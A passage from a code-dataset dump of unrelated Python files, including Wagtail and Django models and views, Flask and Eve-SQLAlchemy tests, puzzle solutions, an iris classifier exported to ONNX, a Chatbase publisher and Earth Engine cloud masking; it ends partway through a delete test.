BlogPageGalleryImage(Orderable):\n page = ParentalKey(BlogPage, on_delete=models.CASCADE, related_name=\"gallery_images\")\n image = models.ForeignKey(\n \"wagtailimages.Image\", on_delete=models.CASCADE, related_name=\"+\"\n )\n caption = models.CharField(blank=True, max_length=250)\n\n panels = [\n ImageChooserPanel(\"image\"),\n FieldPanel(\"caption\")\n ]\n\nclass AboutPage(Page):\n date = models.DateField(default=timezone.now)\n intro = models.CharField(max_length=250)\n body = RichTextField(blank=True)\n\n def main_image(self):\n gallery_item = self.gallery_images.first()\n if gallery_item:\n return gallery_item.image\n else:\n return None\n\n content_panels = Page.content_panels + [\n MultiFieldPanel([\n FieldPanel(\"date\"),\n ], heading=\"Page information\"),\n MultiFieldPanel([\n FieldPanel(\"intro\"),\n FieldPanel(\"body\", classname=\"full\"),\n ], heading=\"Page Content\"),\n ]\n\n def child_pages(self):\n return AboutPage.objects.live().child_of(self).order_by(\"title\")\n\n# Does this need to take in Page as a param? It's just data being handed to About\nclass Bio(Page):\n name = models.CharField(max_length=100)\n description = RichTextField(blank=True)\n representative_image = models.ForeignKey(\n 'wagtailimages.Image',\n null=True,\n blank=True,\n on_delete=models.SET_NULL,\n related_name='+'\n )\n content_panels = Page.content_panels + [\n MultiFieldPanel([\n FieldPanel(\"name\"),\n FieldPanel(\"description\", classname=\"full\"),\n ImageChooserPanel('representative_image'),\n ], heading=\"Bio\")\n ]\n\n def __str__(self):\n return self.name\n\n class Meta:\n verbose_name_plural = \"bios\"\n","sub_path":"blog/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":7526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"8432937","text":"from app.mod_blog.models import Blog\nimport pytest\nfrom app import app\nimport string\nimport random\n\n\n@pytest.fixture\ndef client(request):\n test_client = app.test_client()\n\n return test_client\n\n\ndef id_generator(size=10, chars=string.ascii_letters + string.digits):\n return ''.join(random.choice(chars) for _ in range(size))\n\n\ndef test_index(client):\n \"\"\"\n GIVEN a Flask test client\n WHEN the '/' page is requested (GET)\n THEN check the status code is valid\n \"\"\"\n response = client.get('/')\n assert response.status_code == 200\n\n\ndef test_new_article_instance():\n \"\"\"\n GIVEN a Blog Model\n WHEN a new Blog is created\n THEN check the title and description are defined correctly\n \"\"\"\n\n blog = Blog(\"New Article\", \"Article's description\")\n assert blog.title == \"New Article\"\n assert blog.body == \"Article's description\"\n\n\ndef test_adding_article_db():\n \"\"\"\n Given a Blog Model\n WHEN a new blog is added to the db\n THEN check the title and description are defined correctly from the DB\n \"\"\"\n id = id_generator()\n added_blog = Blog(f\"New Article {id}\", \"Article's description\").save()\n \n blog = Blog.query.filter_by(title=f\"New Article {id}\").first()\n\n assert added_blog.id == blog.id\n assert added_blog.title == blog.title\n assert added_blog.body == blog.body\n assert added_blog.date_created == blog.date_created\n assert added_blog.date_modified == blog.date_modified\n\n added_blog.remove()\n\n\ndef test_removing_article_db():\n \"\"\"\n GIVEN a Blog Model\n WHEN a blog article is removed from the db\n THEN check the article is no more in the db\n \"\"\"\n\n id = id_generator()\n added_blog = Blog(f\"Article being removed {id}\", \"Article's description\")\\\n .save()\n added_blog.remove()\n\n removed_blog = Blog.query.filter_by(title=f\"Article being removed {id}\")\\\n .first()\n\n assert removed_blog is None\n\n","sub_path":"tests/test_blog.py","file_name":"test_blog.py","file_ext":"py","file_size_in_byte":1924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"456785953","text":"IN = [x.split(\"\\n\")[0] for x in open(\"input10.txt\", \"r\").readlines()]\r\nIN = [[char for char in IN[i]] for i in range(len(IN))]\r\n\r\n\r\ndef isInSight(pos1, pos2):\r\n points = abs(pgcd(pos2[0] - pos1[0], pos2[1] - pos1[1])) - 1\r\n if (points == -1 or points == 0):\r\n return 1\r\n increX = (pos2[0] - pos1[0]) / (points + 1)\r\n increY = (pos2[1] - pos1[1]) / (points + 1)\r\n\r\n cx = pos1[0]\r\n cy = pos1[1]\r\n for i in range(points):\r\n cx += increX\r\n cy += increY\r\n if (IN[int(cy)][int(cx)] != \".\"):\r\n return 0\r\n return 1\r\n\r\n\r\ndef pgcd(a, b):\r\n if b == 0:\r\n return a\r\n else:\r\n r = a % b\r\n return pgcd(b, r)\r\n\r\n\r\ndef toString():\r\n s = \"\"\r\n for y in range(h):\r\n for x in range(w):\r\n s += str(IN[y][x]) + \" \"\r\n s += \"\\n\"\r\n print(s)\r\n\r\n\r\nh = len(IN)\r\nw = len(IN[0])\r\n\r\ntoString()\r\n\r\nfor y in range(h):\r\n for x in range(w):\r\n if IN[y][x] != \".\":\r\n sum = 0\r\n for j in range(h):\r\n for i in range(w):\r\n if IN[j][i] != \".\" and (i != x or y != j):\r\n sum += isInSight((x, y), (i, j))\r\n IN[y][x] = str(sum)\r\n\r\nmax = 0\r\nfor y in range(h):\r\n for x in range(w):\r\n if IN[y][x] != \".\" and int(IN[y][x]) > max:\r\n max = int(IN[y][x])\r\n\r\ntoString()\r\n\r\nprint(max)","sub_path":"day10_2.py","file_name":"day10_2.py","file_ext":"py","file_size_in_byte":1372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"484719151","text":"class Solution:\n def uniquePaths(self, m, n):\n \"\"\"\n :type m: int\n :type n: int\n :rtype: int\n \"\"\"\n dp = [[1] * (m + 1) for i in range(n + 1)]\n for i in range(2, n+1):\n for j in range(2, m+1):\n dp[i][j] = dp[i-1][j] + dp[i][j-1]\n return dp[-1][-1]\n\nif __name__ == \"__main__\":\n s = Solution()\n result = s.uniquePaths(7, 3)\n print(result)","sub_path":"0-100/62_unique_path.py","file_name":"62_unique_path.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"169976740","text":"import pandas as pd\nfrom pandas.plotting import scatter_matrix\nimport matplotlib.pyplot as plt\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.linear_model import LogisticRegression\nfrom skl2onnx import convert_sklearn\nfrom skl2onnx.common.data_types import FloatTensorType\n\ndata = pd.read_csv('https://archive.ics.uci.edu/ml/machine-learning-databases/iris/iris.data', sep=\",\",\n names=['sepal length in cm', 'sepal width in cm', 'petal length in cm', 'petal width in cm',\n 'class'])\n\ndescription = data.describe()\nprint(description)\nscatter_matrix(data)\nfigure = plt.gcf()\nfigure.set_size_inches(10, 10)\nplt.savefig(\"../images/sample.png\", dpi=100)\n\narray = data.values\nx = array[:, 0:4]\ny = array[:, 4]\n\nx_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.2, random_state=2020)\n\nlr = LogisticRegression(penalty='l2', random_state=2020, solver='liblinear')\nlr.fit(x_train, y_train)\n\nscore = lr.score(x_test, y_test)\n\nprint('score:', score)\n\ninitial_type = [('float_input', FloatTensorType([None, 4]))]\nonx = convert_sklearn(lr, initial_types=initial_type)\nwith open(\"../model/rf_iris.onnx\", \"wb\") as f:\n f.write(onx.SerializeToString())\n","sub_path":"P_Iris/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"448794565","text":"import logging\nimport os\n\nfrom . import utils_config\nfrom . import utils_module_dir\nfrom . import utils_shell\n\nLOGGER = logging.getLogger(__name__)\n\n\ndef handle_pull_code(search_in=None, **ignore):\n utils_shell.execute('python2.7 -m devenv revert-patch %s' % (search_in or ''), shell=True)\n for module_dir, _ in utils_module_dir.search(search_in):\n code_dir = os.path.join(module_dir, 'code')\n if not os.path.exists(code_dir):\n continue\n module_config = utils_config.read(os.path.join(module_dir, 'supervisord.conf'))\n code_type = module_config.get_option_or_exit('code', 'type')\n if code_type == 'svn':\n utils_shell.execute('svn up', cwd=code_dir, shell=True)\n elif code_type == 'git':\n branch = module_config.get_option_or_exit('code', 'branch')\n utils_shell.execute('git pull origin %s' % branch, cwd=code_dir, shell=True)\n else:\n LOGGER.error('not supported version control: %s' % code_type)\n\n\n","sub_path":"devenv/handle_pull_code.py","file_name":"handle_pull_code.py","file_ext":"py","file_size_in_byte":1008,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"46596195","text":"import time\nimport traceback\nimport os\nfrom chatbase import Message, MessageSet, MessageTypes, InvalidMessageTypeError\n\n\nclass ChatBasePublisher:\n\n def __init__(self):\n self.api_key=os.environ[\"CHAT_BASE_API_KEY\"] # Chatbase API key\n self.platform = 'lord_lewin_chatbot' # Chat platform name\n # message_user = 'Do you know the time, please?' # User message\n # message_bot = 'It's 12 o'clock!' # Bot response message\n self.version = '1' # Bot version, useful if you want to mark them for A/B testing or compare results across versions\n # time_stamp = int(round(time.time() * 1e3)) # Mandatory\n\n def publish(self,userQuery,botResponse,not_handled,userId,intent):\n time_stamp = int(round(time.time() * 1e3)) # Mandatory\n \n # Create an instance of MessageSet to collect all the messages\n message_set = MessageSet(api_key=str(self.api_key), platform=self.platform,\n version=self.version, user_id=userId)\n # Create an instance of Message for the user message and set values in the constructor\n msg1 = Message(api_key=self.api_key, platform=self.platform, message=userQuery,\n intent=intent, version=self.version, user_id=userId,\n type=MessageTypes.USER, not_handled=not_handled,\n time_stamp=time_stamp)\n # msg1.set_as_feedback()\n\n # Create an instance of Message for the bot response message and set values in the constructor\n msg2 = Message(api_key=self.api_key, platform=self.platform, message=botResponse,\n version=self.version, user_id=userId,\n type=MessageTypes.AGENT)\n\n # Push messages into the collection (MessageSet)\n message_set.append_message(msg1)\n message_set.append_message(msg2)\n\n \n # Send the messages\n response = message_set.send()\n print('Response code for sending Chatbase Message', response.content)\n # response.status_code will be 200 if sending worked","sub_path":"docker/keras-chat-engine/app/analytics/chatbasepublisher.py","file_name":"chatbasepublisher.py","file_ext":"py","file_size_in_byte":2045,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"389839370","text":"# coding:utf-8\nfrom django.shortcuts import render_to_response\nfrom .models import *\n\n\ndef list(request):\n statue = \"列表展示页\"\n table_list = Server.objects.all()\n return render_to_response(\"list.html\", locals())\n\n\ndef content(request):\n statue = \"服务器详情页\"\n host_data = {\n \"host_name\": \"bian-PC\",\n \"ip\": \"192.168.0.14\",\n \"mac\": \"00-00-00-00-00-00-00-E0\",\n \"cpu\": \" Intel(R) Xeon(R) CPU E5-2650 v2 @ 2.60GHz\",\n \"mem\": \"12G\",\n \"disk\": \"500G\",\n \"system\": \"windows7\",\n \"model\": \"Thinkpad E431\"\n }\n return render_to_response(\"server_content.html\", locals())\n","sub_path":"ProjOMMP/Server/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":647,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"313638451","text":"def findMaxConsecutiveOnes(nums):\n max = 0\n temp = 0\n for n in nums:\n if n == 1:\n temp += 1\n if temp > max:\n max = temp\n else:\n temp = 0\n return max\n\n\nprint(findMaxConsecutiveOnes([1, 1, 0, 1, 1, 1]))\n","sub_path":"Python/Easy/maxConsecutiveOnes.py","file_name":"maxConsecutiveOnes.py","file_ext":"py","file_size_in_byte":255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"501401736","text":"import ee\nfrom sepal.ee.image import select_and_add_missing\n\nfrom ..image_operation import ImageOperation\n\n\ndef mask_clouds(mosaic_def, collection):\n if not mosaic_def.mask_clouds:\n reduced = collection.select('cloud') \\\n .reduce(ee.Reducer.sum()\n .combine(ee.Reducer.count(), \"\", True)\n .combine(ee.Reducer.min(), \"\", True))\n # Proportion of pixels that are cloudy\n cloud_proportion = select_and_add_missing(reduced, ['cloud_sum']) \\\n .divide(select_and_add_missing(reduced, ['cloud_count']))\n # A representative proportion of pixels that are cloudy cloudy for the neighborhood\n normal_cloud_proportion = cloud_proportion.reproject(crs='EPSG:4326', scale=10000) \\\n .max(cloud_proportion.reproject(crs='EPSG:4326', scale=20000))\n # Measure of how a locations cloud proportion differs from the general area\n cloud_proportion_diff = cloud_proportion.subtract(normal_cloud_proportion)\n only_clouds = select_and_add_missing(reduced, ['cloud_min'])\n\n # When there is higher proportion of clouds than the normally, keep the clouds.\n # It's probably something (typically buildings) misclassified as clouds.\n # Also, don't trust the cloud classification enough to completely mask area with only clouds\n # Desert sand can be classified as cloud.\n keep_clouds = cloud_proportion_diff.gt(0.4).And(normal_cloud_proportion.lt(0.3))\n keep_clouds = keep_clouds.Or(only_clouds)\n else:\n keep_clouds = False\n\n return collection.map(lambda image: _MaskClouds(image, mosaic_def).apply(keep_clouds))\n\n\nclass _MaskClouds(ImageOperation):\n def __init__(self, image, mosaic_def):\n super(_MaskClouds, self).__init__(image)\n self.mosaic_def = mosaic_def\n\n def apply(self, keep_clouds):\n cloud_free = self.toImage('!i.cloud')\n buffer_meters = self.mosaic_def.cloud_buffer\n if buffer_meters:\n cloud_free = buffer_mask(self.toImage('!i.cloud'), buffer_meters).And(cloud_free)\n to_mask = self.image.select('toMask')\n if keep_clouds:\n mask = to_mask.Not().And(cloud_free.Or(keep_clouds))\n else:\n mask = to_mask.Not().And(cloud_free)\n return self.image.updateMask(mask)\n\n\ndef buffer_mask(mask, meters):\n cloud = mask.Not()\n min_cloud_radius = 50\n\n # Clouds with radius < min_cloud_radius will not have any inner pixels, and will not get buffered\n inner_pixel = mask \\\n .fastDistanceTransform(256, 'pixels').sqrt() \\\n .multiply(ee.Image.pixelArea().sqrt()) \\\n .gt(min_cloud_radius) \\\n .And(cloud)\n\n distance_to_inner_pixel = inner_pixel \\\n .fastDistanceTransform(256, 'pixels').sqrt() \\\n .multiply(ee.Image.pixelArea().sqrt())\n\n return distance_to_inner_pixel \\\n .lt(ee.Number(meters).add(min_cloud_radius)) \\\n .Or(cloud) \\\n .Not()\n","sub_path":"modules/google-earth-engine/docker/src/sepalinternal/mosaic/clouds.py","file_name":"clouds.py","file_ext":"py","file_size_in_byte":2951,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"633822408","text":"import sys, os, argparse\n\nimport job_queue\n\n\ndef parse_args(argv):\n parser = argparse.ArgumentParser(description='Submit job scripts')\n parser.add_argument('job_script', nargs='+')\n parser.add_argument('--array', '-a')\n return parser.parse_args(argv)\n\n\ndef main(argv):\n args = parse_args(argv)\n for job_script in args.job_script:\n queue = job_queue.get_job_queue(job_script)\n work_dir = os.path.dirname(job_script)\n job_id = queue.submit_job(job_script, work_dir=work_dir, array_idx=args.array)\n print(job_id)\n\n\nif __name__ == '__main__':\n main(sys.argv[1:])\n","sub_path":"submit_job.py","file_name":"submit_job.py","file_ext":"py","file_size_in_byte":608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"408351033","text":"#! /usr/bin/env python\n\nfrom portals.permissions import permissions_check, superuser_required\n\nfrom django.contrib.auth.decorators import login_required\nfrom django.shortcuts import HttpResponse, render\n\nfrom .forms import VendorForm\nfrom .models import Vendor\n\n@login_required\n@permissions_check()\ndef index(request):\n\n vendor_find = []\n temp_name = \"cmdb/cmdb-header.html\"\n vendors = Vendor.objects.all()\n vendor_find = Vendor.objects.all()\n \n return render(request, 'cmdb/vendor.html', locals())\n\n@login_required\n@permissions_check()\ndef vendor_add(request):\n temp_name = \"cmdb/cmdb-header.html\"\n if request.POST:\n vendor_form = VendorForm(request.POST)\n if vendor_form.is_valid():\n vendor_form.save()\n tips = '厂商增加成功'\n display_control = ''\n else:\n tips = '厂商增加失败'\n display_control = ''\n return render(request, \"cmdb/vendor_add.html\", locals())\n else:\n display_control = 'none'\n vendor_form = VendorForm()\n return render(request, 'cmdb/vendor_add.html', locals())\n\n@login_required\n@permissions_check()\ndef vendor_edit(request, ids):\n status = 0\n\n obj = Vendor.objects.filter(id=ids)\n if len(obj) == 1:\n obj = obj[0]\n else:\n obj = None\n\n if request.method == 'POST':\n af = VendorForm(request.POST, instance=obj)\n if af.is_valid():\n af.save()\n status = 1\n else:\n status = 2\n else:\n af = VendorForm(instance=obj)\n\n return render(request, 'cmdb/vendor_edit.html', locals())\n\n\n@login_required()\n@permissions_check()\ndef vendor_del(request):\n vendor_id = request.GET.get('id', '')\n if vendor_id:\n Vendor.objects.filter(id=vendor_id).delete()\n\n if request.method == 'POST':\n vendor_batch = request.GET.get('arg', '')\n vendor_id_all = str(request.POST.get('vendor_id_all', ''))\n\n if vendor_batch:\n for vendor_id in vendor_id_all.split(','):\n vendor_item = HostGroup.objects.filter(id=vendor_id)\n if len(vendor_item) == 1:\n vendor_item = vendor_item[0]\n else:\n vendor_item = None\n vendor_item.delete()\n\n return HttpResponse('厂商删除成功')","sub_path":"cmdb/vendor.py","file_name":"vendor.py","file_ext":"py","file_size_in_byte":2339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"109222506","text":"# 217 contains-duplicate/\nclass Solution(object):\n def containsDuplicate(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: bool\n \"\"\"\n d={}\n for x in nums:\n if d.has_key(x): return True\n d[x]=''\n\n return False\n","sub_path":"217.py","file_name":"217.py","file_ext":"py","file_size_in_byte":284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"527012938","text":"from flask_wtf import CSRFProtect, FlaskForm, RecaptchaField\nfrom wtforms.fields import TextAreaField\nfrom wtforms.fields.html5 import EmailField\nfrom wtforms.validators import DataRequired, Email\n\ncsrf = CSRFProtect()\n\nclass SubscribeForm(FlaskForm):\n email = EmailField(\n label='Subscribe for the latest and greatest!',\n validators=[DataRequired(), Email()],\n id='subscribe-email',\n render_kw={'placeholder': 'Email'}\n )\n\nclass ContactForm(FlaskForm):\n sender = EmailField(\n validators=[DataRequired(), Email()],\n id='contact-sender',\n render_kw={'placeholder': 'Email'}\n )\n body = TextAreaField(\n validators=[DataRequired()],\n id='contact-body',\n render_kw={\n 'placeholder': 'Message',\n 'rows': '5'\n }\n )\n captcha = RecaptchaField()\n","sub_path":"app/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":856,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"515365491","text":"#!/usr/bin/env python\nimport sys\n\"\"\"\nThe 0/1 Knapsack Problem\n\nGiven a set of items, each with a weight and a value, and a\nknapsack with a max weight. What is the subset of items has\na the highest value without exceding the max weight of the\nknapsack.\n\nGiven a set of all items S and a subset S' which is optimal\nsubset given the knapsack weight.S' must still be optimal if\nan item is removed from it and S.\n\n\n\"\"\"\n\ndef knapsack(items, sack):\n \"\"\"\n items = [(v,w),(v,w)]\n sack = int\n \"\"\"\n A = [[0] * len(items) for x in range(sack+1)]\n for i in range(0, len(items)):\n for j in range(0, sack+1):\n if items[i][1] > j:\n A[j][i] = A[j][i-1]\n else:\n A[j][i] = max(A[j][i-1], A[j-items[i][1]][i-1] + items[i][0])\n return A\n\ndef recursive_knapsack(items, size):\n cache = {}\n def inner(items, size, totalItems, currentItem, cache):\n if currentItem >= totalItems or size <= 0:\n return 0\n key = (totalItems - currentItem -1, size)\n if key in cache:\n return cache[key]\n elif items[currentItem][1] > size:\n maxValue = inner(items, size, totalItems, currentItem+1, cache)\n else:\n maxValue = max(items[currentItem][0] + inner(items, size-items[currentItem][1], totalItems, currentItem+1, cache),\n inner(items, size, totalItems, currentItem+1, cache))\n\n cache[key] = maxValue\n return maxValue\n return inner(items, size, len(items), 0, cache)\n\ndef reconstruct(A, items):\n result = []\n j = len(A)-1\n i = len(A[j])-1\n while j > 1:\n if A[j][i] != A[j][i-1]:\n result.append(i+1)\n j -= items[i][1]\n i -= 1\n return result\n\ndef load_items(filename):\n \"\"\" Generate graph path from text file \"\"\"\n file = open(filename, 'r')\n # Map each line of test data to a line in the data list:\n data = [ [int(y) for y in x.rstrip().split(' ')] for x in file]\n return data\n\ndef print_result(result, reconstruct_flag=False):\n for i in range(len(result)-1, -1, -1):\n print(i,result[i])\n print(' '+' '.join([str(x) for x in range(1,len(items)+1)]))\n print(\"Optimal Value: %s\" % result[-1][-1])\n if reconstruct_flag == True:\n print(\"Items Chosen: %s\" % reconstruct(result, items))\n\nif __name__ == '__main__':\n items = [(3,4)\n ,(2,3)\n ,(4,2)\n ,(4,3)\n ]\n result = knapsack(items, 6)\n print_result(result, True)\n\n","sub_path":"dynamic/01knapsack.py","file_name":"01knapsack.py","file_ext":"py","file_size_in_byte":2508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"391976240","text":"import improvedMunkres\r\nimport time\r\nimport numpy as np\r\nimport matplotlib.pylab as plt\r\nimport ver2\r\nimport pandas as pd\r\n\r\ncolors = ['r.-', 'g.-', 'b.-', 'y.-', 'c.-', 'm.-']\r\n\r\ndef change_N(Max, k, end,n_loop):\r\n\r\n data = [[], [], []]\r\n\r\n for N in range(100, end, 100):\r\n\r\n mode2 = 0\r\n mode3 = 0\r\n\r\n for loop in range(n_loop):\r\n\r\n s = np.random.rand(N, 2) * Max\r\n e = np.random.rand(N, 2) * Max\r\n\r\n start_time = time.time()\r\n improvedMunkres.improved_munkres(s, e, Max, N, k)\r\n print(\"%d---%s seconds ---\" % (N,time.time() - start_time))\r\n mode2 += time.time() - start_time\r\n\r\n start_time = time.time()\r\n ver2.improved_munkres(s, e, Max, N, k)\r\n print(\"%d---%s seconds ---\" % (N,time.time() - start_time))\r\n mode3 += time.time() - start_time\r\n\r\n data[0].append(N)\r\n data[1].append(mode2 / n_loop)\r\n data[2].append(mode3/n_loop)\r\n\r\n dataframe = pd.DataFrame(data)\r\n dataframe.to_csv(\"data.csv\")\r\n\r\ndef change_cluster(Max,N, start, end ,jump ,n_loop):\r\n\r\n data = [[],[]]\r\n\r\n for k in range(start, end, jump):\r\n\r\n result = 0\r\n\r\n s = np.random.rand(N, 2) * Max\r\n e = np.random.rand(N, 2) * Max\r\n\r\n s_time = time.time()\r\n result = ver2.improved_munkres(s, e, Max, N, k)\r\n time_result = time.time()-s_time\r\n\r\n data[0].append(k)\r\n data[1].append(result)\r\n\r\n print(k)\r\n\r\n dataframe = pd.DataFrame(data)\r\n dataframe.to_csv(\"err_data.csv\")\r\n\r\n\r\nchange_N(1, 100, 1100, 1)\r\n# change_cluster(1,1000,10,20,10,1)","sub_path":"fu.py","file_name":"fu.py","file_ext":"py","file_size_in_byte":1639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"85993281","text":"import os\nimport logging\n\nif os.getenv('FLASK_ENV', 'prod') != 'prod':\n config_name = 'dev'\nelse:\n config_name = 'prod'\n\n\nsettings = {}\nwith open('instance/{0}.cfg'.format(config_name)) as f:\n for line in f:\n if line == '\\n':\n continue\n (key, val) = line.split('=')\n settings[key.strip()] = val.strip()\n\n\nlog_conversion = {'DEBUG': logging.DEBUG, 'INFO': logging.INFO}\nlog_level = log_conversion[settings['LOG_LEVEL']]\n\nfetch_wait_secs = 60 * 15 # 15 minutes","sub_path":"scraper/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":500,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"145440181","text":"#!usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n\r\nimport sys\r\nfrom PyQt5.QtWidgets import QDialog, QFileDialog\r\nfrom matplotlib import pyplot as plt\r\nfrom ui_figure import *\r\nfrom ccd_plot import CCDReader\r\n\r\nclass Dialog(QDialog):\r\n\r\n def browsecache(self):\r\n\r\n cachedir = QFileDialog.getExistingDirectory(self)\r\n\r\n self.ui.browsecacheline.setText(cachedir)\r\n\r\n return None\r\n\r\n def browsejson(self):\r\n\r\n jsondir = QFileDialog.getExistingDirectory(self)\r\n\r\n self.ui.browsejsonline.setText(jsondir)\r\n\r\n return None\r\n\r\n def browseoutput(self):\r\n\r\n outputdir = QFileDialog.getExistingDirectory(self)\r\n\r\n self.ui.browseoutputline.setText(outputdir)\r\n\r\n return None\r\n\r\n def __init__(self):\r\n\r\n super(Dialog, self).__init__()\r\n\r\n # set up the user interface from Qt Designer\r\n self.ui = Ui_Form()\r\n\r\n self.ui.setupUi(self)\r\n\r\n self.ui.browsecachebutton.clicked.connect(self.browsecache)\r\n\r\n self.ui.browsejsonbutton.clicked.connect(self.browsejson)\r\n\r\n self.ui.browseoutputbutton.clicked.connect(self.browseoutput)\r\n\r\n self.ui.plotbutton.clicked.connect(self.plot)\r\n\r\n self.ui.exitbutton.clicked.connect(self.exit_plot)\r\n\r\n def plot(self):\r\n\r\n cachedir = self.ui.browsecacheline.text()\r\n\r\n jsondir = self.ui.browsejsonline.text()\r\n\r\n outputdir = self.ui.browseoutputline.text()\r\n\r\n arccoords = self.ui.arccoordsline.text()\r\n\r\n hval = self.ui.hline.text()\r\n\r\n vval = self.ui.vline.text()\r\n\r\n drawmodelfit = self.ui.radiomodelfit.isChecked()\r\n\r\n drawmaskedobs = self.ui.radiomasked.isChecked()\r\n\r\n ccd_curves = CCDReader(h=int(hval), v=int(vval), cache_dir=str(cachedir),\r\n json_dir=str(jsondir), arc_coords=str(arccoords), output_dir=str(outputdir),\r\n drawmodelfit=drawmodelfit, drawmaskedobs=drawmaskedobs)\r\n return None\r\n\r\n def exit_plot(self):\r\n\r\n self.close()\r\n\r\n plt.close(\"all\")\r\n\r\n sys.exit(0)\r\n\r\n return None\r\n","sub_path":"build_qt.py","file_name":"build_qt.py","file_ext":"py","file_size_in_byte":2112,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"241957184","text":"from easydict import EasyDict as edict\n\n# initalization\n__C_FDST = edict()\ncfg_data = __C_FDST\n__C_FDST.DATASET = 'FDST'\n\n# dataset parameters\n__C_FDST.STD_SIZE = (1080, 1920)\n__C_FDST.TRAIN_SIZE = (360, 640)\n__C_FDST.DATA_PATH = ''\n__C_FDST.MEAN_STD = ([0.484614104033, 0.455819487572, 0.432390660048], [\n 0.23891659081, 0.229008644819, 0.226914435625])\n\n# standard data parameters\n__C_FDST.LABEL_FACTOR = 1\n__C_FDST.LOG_PARA = 100.\n\n# training parameters\n__C_FDST.TRAIN_BATCH_SIZE = 1\n__C_FDST.TRAIN_DOWNRATE = 3\n\n# validation parameters\n__C_FDST.VAL_BATCH_SIZE = 1\n","sub_path":"adacrowd/datasets/baselines/FDST/setting.py","file_name":"setting.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"9951557","text":"from datetime import datetime\nfrom eve_sqlalchemy.tests import TestBaseSQL\nfrom eve.tests.utils import DummyEvent\nfrom eve import ETAG\n\n\nclass TestDeleteSQL(TestBaseSQL):\n\n def setUp(self, settings_file=None, url_converters=None):\n super(TestDeleteSQL, self).setUp(settings_file, url_converters)\n # Etag used to delete an item (a contact)\n self.etag_headers = [('If-Match', self.item_etag)]\n\n def test_unknown_resource(self):\n url = '%s%s/' % (self.unknown_resource_url, self.item_id)\n _, status = self.delete(url)\n self.assert404(status)\n\n def test_delete_from_resource_endpoint(self):\n r, status = self.delete(self.known_resource_url)\n self.assert204(status)\n r, status = self.parse_response(self.test_client.get(\n self.known_resource_url))\n self.assert200(status)\n self.assertEqual(len(r['_items']), 0)\n\n def test_delete_from_resource_endpoint_different_resource(self):\n r, status = self.delete(self.different_resource_url)\n self.assert204(status)\n r, status = self.parse_response(self.test_client.get(\n self.different_resource_url))\n self.assert200(status)\n self.assertEqual(len(r['_items']), 0)\n\n # deletion of 'users' will still lave 'contacts' untouched (same db\n # collection)\n r, status = self.parse_response(self.test_client.get(\n self.known_resource_url))\n self.assert200(status)\n self.assertEqual(len(r['_items']), 25)\n\n def test_delete_empty_resource(self):\n url = '%s%s/' % (self.empty_resource_url, self.item_id)\n _, status = self.delete(url)\n self.assert404(status)\n\n def test_delete_readonly_resource(self):\n _, status = self.delete(self.readonly_id_url)\n self.assert405(status)\n\n def test_delete_unknown_item(self):\n url = '%s%s/' % (self.known_resource_url, self.unknown_item_id)\n _, status = self.delete(url)\n self.assert404(status)\n\n def test_delete_if_match_missing(self):\n _, status = self.delete(self.item_id_url)\n self.assert403(status)\n\n def test_delete_if_match_disabled(self):\n self.app.config['IF_MATCH'] = False\n _, status = self.delete(self.item_id_url)\n self.assert204(status)\n\n def test_delete_ifmatch_bad_etag(self):\n _, status = self.delete(self.item_id_url,\n headers=[('If-Match', 'not-quite-right')])\n self.assert412(status)\n\n def test_delete(self):\n r, status = self.delete(self.item_id_url, headers=self.etag_headers)\n self.assert204(status)\n\n r = self.test_client.get(self.item_id_url)\n self.assert404(r.status_code)\n\n def test_delete_non_existant(self):\n url = self.item_id_url[:-5] + \"00000\"\n r, status = self.delete(url, headers=self.etag_headers)\n self.assert404(status)\n\n def test_delete_different_resource(self):\n r, status = self.delete(self.user_id_url,\n headers=[('If-Match', self.user_etag)])\n self.assert204(status)\n\n r = self.test_client.get(self.user_id_url)\n self.assert404(r.status_code)\n\n def test_delete_with_post_override(self):\n # POST request with DELETE override turns into a DELETE\n headers = [('X-HTTP-Method-Override', 'DELETE'),\n ('If-Match', self.item_etag)]\n r = self.test_client.post(self.item_id_url, data={}, headers=headers)\n self.assert204(r.status_code)\n\n def test_delete_subresource(self):\n _db = self.app.data.driver\n\n # create random person\n fake_person = self.test_sql_tables.People.\\\n from_tuple(self.random_people(1)[0])\n fake_person._created = datetime.now()\n fake_person._updated = 